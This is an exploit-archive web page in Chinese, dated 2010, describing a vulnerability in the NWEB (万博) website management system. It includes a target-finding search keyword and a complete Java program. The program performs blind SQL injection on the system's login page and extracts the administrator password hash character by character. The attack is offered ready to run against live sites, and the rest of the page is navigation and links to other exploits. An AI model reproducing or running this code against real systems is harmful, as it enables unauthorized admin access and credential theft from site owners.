首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
万博网站管理系统(NWEB)通杀漏洞
来源:vfocus.net 作者:vfocus 发布时间:2010-09-21  

keyword:system/adminlogin.asp

EXP:jave的,请安装JAVE环境

package com.sogili.exp;


import java.io.*;
import java.net.*;

public class PostResquest {
       
        private String[] key={"1","2","3","4","5","6","7","8","9","0","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","z","y"};

        public PostResquest() {
                String urlStr="http://www.xxxxx.com/system/chklogin.asp";
                String value = "managerName=asdads'or%20mid(F_PassWord,Num,1)='Str&tpassWord=123456&surl=&submit.x=0&submit.y=0";
                String tempValue;
                String tempValue2;
                OutputStreamWriter oswPost;
                BufferedReader brPost;
                try {
                        URL url=new URL(urlStr);
                        StringBuffer temp;
                        HttpURLConnection conn;
                        for(int k=1;k<=16;k++){
                                tempValue=value.replaceAll("Num",String.valueOf(k));
                                for(int i=0;i<key.length;i++){
                                        conn= (HttpURLConnection)url.openConnection();
                                        conn.setDoOutput(true);
                                        tempValue2=tempValue.replaceAll("Str", key[i]);
                                        oswPost=new OutputStreamWriter(conn.getOutputStream());
                                        oswPost.write(tempValue2);
                                        oswPost.flush();
                                        oswPost.close();
                                        brPost=new BufferedReader(new InputStreamReader(conn.getInputStream()));
                                        String line=null;
                                        temp=new StringBuffer();
                            while((line=brPost.readLine())!=null)
                            {
                                    line=new String(line.getBytes(),"gb2312");
                                    temp.append(line+"\r\n");
                            }
                            if(temp.indexOf("口令")>-1){
                                    System.out.print(key[i]);
                                    break;
                            }
                            if(i==key.length-1){
                                    System.out.println("出错了");
                                    return;
                            }
                           
                                }
                        }
                } catch (MalformedURLException e) {
                        e.printStackTrace();
                } catch (IOException e) {
                        e.printStackTrace();
                }
        }
        public static void main(String[] args) {
                new PostResquest();
        }
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·BifrsoT DLL Hijacking Exploit
·RarCrack v0.2 "filename" init(
·Personal.Net Portal Multiple V
·Microsoft DRM Technology (msne
·Acoustica Audio Converter Pro
·Java CMM readMabCurveData Stac
·Softek Barcode Reader Toolkit
·VWD-CMS CSRF Vulnerability
·Novell iPrint Client ActiveX C
·SWiSHmax DLL Hijacking Exploit
·Novell iPrint Client ActiveX C
·RarCrack 0.2 Buffer Overflow P
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved